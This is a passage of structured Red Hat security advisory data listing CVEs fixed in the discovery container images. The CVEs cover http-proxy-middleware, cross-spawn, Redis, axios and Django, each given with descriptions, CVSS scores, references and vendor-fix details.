"NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "http-proxy-middleware: Denial of Service", }, { cve: "CVE-2024-21538", cwe: { id: "CWE-1333", name: "Inefficient Regular Expression Complexity", }, discovery_date: "2024-11-08T13:44:29.182678+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2324550", }, ], notes: [ { category: "description", text: "A Regular Expression Denial of Service (ReDoS) vulnerability was found in the cross-spawn package for Node.js. Due to improper input sanitization, an attacker can increase CPU usage and crash the program with a large, specially crafted string.", title: "Vulnerability description", }, { category: "summary", text: "cross-spawn: regular expression denial of service", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-21538", }, { category: "external", summary: "RHBZ#2324550", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2324550", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-21538", url: "https://www.cve.org/CVERecord?id=CVE-2024-21538", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-21538", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-21538", }, { category: "external", summary: "https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff", url: "https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff", }, { category: "external", summary: "https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f", url: "https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f", }, { category: "external", summary: "https://github.com/moxystudio/node-cross-spawn/pull/160", url: "https://github.com/moxystudio/node-cross-spawn/pull/160", }, { category: "external", summary: "https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230", url: "https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230", }, ], release_date: "2024-11-08T05:00:04.695000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 4.4, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "cross-spawn: regular expression denial of service", }, { cve: "CVE-2024-31228", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-10-07T20:01:32.319599+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2317058", }, ], notes: [ { category: "description", text: "A flaw was found in Redis. This flaw allows authenticated users to trigger a denial of service by using specially crafted, long string match patterns on supported commands such as `KEYS`, `SCAN`, `PSUBSCRIBE`, `FUNCTION LIST`, `COMMAND LIST`, and ACL definitions. Matching of extremely long patterns may result in unbounded recursion, leading to stack overflow and process crashes.", title: "Vulnerability description", }, { category: "summary", text: "redis: Denial-of-service due to unbounded pattern matching in Redis", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-31228", }, { category: "external", summary: "RHBZ#2317058", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2317058", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-31228", url: "https://www.cve.org/CVERecord?id=CVE-2024-31228", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-31228", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-31228", }, { category: "external", summary: "https://github.com/redis/redis/commit/9317bf64659b33166a943ec03d5d9b954e86afb0", url: "https://github.com/redis/redis/commit/9317bf64659b33166a943ec03d5d9b954e86afb0", }, { category: "external", summary: "https://github.com/redis/redis/security/advisories/GHSA-66gq-c942-6976", url: "https://github.com/redis/redis/security/advisories/GHSA-66gq-c942-6976", }, ], release_date: "2024-10-07T19:51:06.784000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options don't meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 5.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "redis: Denial-of-service due to unbounded pattern matching in Redis", }, { cve: "CVE-2024-31449", cwe: { id: "CWE-20", name: "Improper Input Validation", }, discovery_date: "2024-10-07T20:01:19.998028+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2317056", }, ], notes: [ { category: "description", text: "A flaw was found in Redis. This flaw allows an authenticated user to use a specially crafted Lua script to trigger a stack buffer overflow in the bit library, which may lead to remote code execution. The problem exists in all versions of Redis with Lua scripting.", title: "Vulnerability description", }, { category: "summary", text: "redis: Lua library commands may lead to stack overflow and RCE in Redis", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-31449", }, { category: "external", summary: "RHBZ#2317056", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2317056", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-31449", url: "https://www.cve.org/CVERecord?id=CVE-2024-31449", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-31449", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-31449", }, { category: "external", summary: "https://github.com/redis/redis/commit/1f7c148be2cbacf7d50aa461c58b871e87cc5ed9", url: "https://github.com/redis/redis/commit/1f7c148be2cbacf7d50aa461c58b871e87cc5ed9", }, { category: "external", summary: "https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5", url: "https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5", }, ], release_date: "2024-10-07T19:51:08.775000+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "redis: Lua library commands may lead to stack overflow and RCE in Redis", }, { cve: "CVE-2024-39338", cwe: { id: "CWE-918", name: "Server-Side Request Forgery (SSRF)", }, discovery_date: "2024-08-13T17:21:32.774718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2304369", }, ], notes: [ { category: "description", text: "A vulnerability was found in the Axios HTTP Client. It is vulnerable to a server-side request forgery attack (SSRF) caused by unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. This flaw allows an attacker to perform arbitrary requests from the server, potentially accessing internal systems or exfiltrating sensitive data.", title: "Vulnerability description", }, { category: "summary", text: "axios: axios: Server-Side Request Forgery", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability is rated as IMPORTANT because it can be exploited remotely with low complexity and without user interaction, it poses a significant risk to confidentiality.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "RHBZ#2304369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304369", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-39338", url: "https://www.cve.org/CVERecord?id=CVE-2024-39338", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", }, { category: "external", summary: "https://github.com/axios/axios/releases", url: "https://github.com/axios/axios/releases", }, { category: "external", summary: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", url: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", }, ], release_date: "2024-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "axios: axios: Server-Side Request Forgery", }, { cve: "CVE-2024-41989", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-08-02T01:40:06+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2302433", }, ], notes: [ { category: "description", text: "A security issue was found in Django. If 'floatformat' received a string representation of a number in scientific notation with a large exponent, it could lead to significant memory consumption. To avoid this, decimals with more than 200 digits are now returned as is.", title: "Vulnerability description", }, { category: "summary", text: "python-django: Memory exhaustion in django.utils.numberformat.floatformat()", title: "Vulnerability summary", }, { category: "other", text: "This issue is categorized as moderate severity rather than important because, while it has the potential to cause significant memory consumption under specific conditions, the likelihood of such a scenario occurring in typical applications is relatively low. The issue arises primarily when processing extremely large numbers in scientific notation, which is not a common use case in most Django applications. Additionally, the impact is localized to the floatformat function, and the issue does not expose sensitive data or compromise the integrity of the application.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-41989", }, { category: "external", summary: "RHBZ#2302433", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302433", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-41989", url: "https://www.cve.org/CVERecord?id=CVE-2024-41989", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-41989", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-41989", }, ], release_date: "2024-08-06T13:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2025:1249", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "python-django: Memory exhaustion in django.utils.numberformat.floatformat()", }, { cve: "CVE-2024-41991", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-08-02T02:03:22+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2302435", }, ], notes: [ { category: "description", text: "A flaw was found in Django. 'urlize', 'urlizetrunc', and 'AdminURLFieldWidget' may be subject to a denial of service attack via certain inputs with a very large number of Unicode characters.", title: "Vulnerability description", }, { category: "summary", text: "python-django: Potential denial-of-service vulnerability in django.utils.html.urlize() and AdminURLFieldWidget", title: "Vulnerability summary", }, { category: "other", text: "The identified vulnerability in Django's urlize, urlizetrunc template filters, and the AdminURLFieldWidget widget is classified as moderate severity rather than important due to its specific attack vector and impact. While the flaw allows for a potential denial-of-service (DoS) attack via inputs with a large number of Unicode characters, exploiting this vulnerability requires a significant volume of data to be processed by these components, which is a non-trivial task. Additionally, standard mitigation measures such as input validation, rate limiting, and monitoring can effectively reduce the risk.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-41991", }, { category: "external", summary: "RHBZ#2302435", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302435", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-41991", url: "https://www.cve.org/CVERecord?id=CVE-2024-41991", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-41991", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-41991", }, { category: "external", summary: "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/", url: "https://www.djangoproject.com/weblog/2024/aug/06/security-releases/", }, ], release_date: "2024-08-06T13:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2025-02-10T18:38:39+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64", "9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64", "9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64", 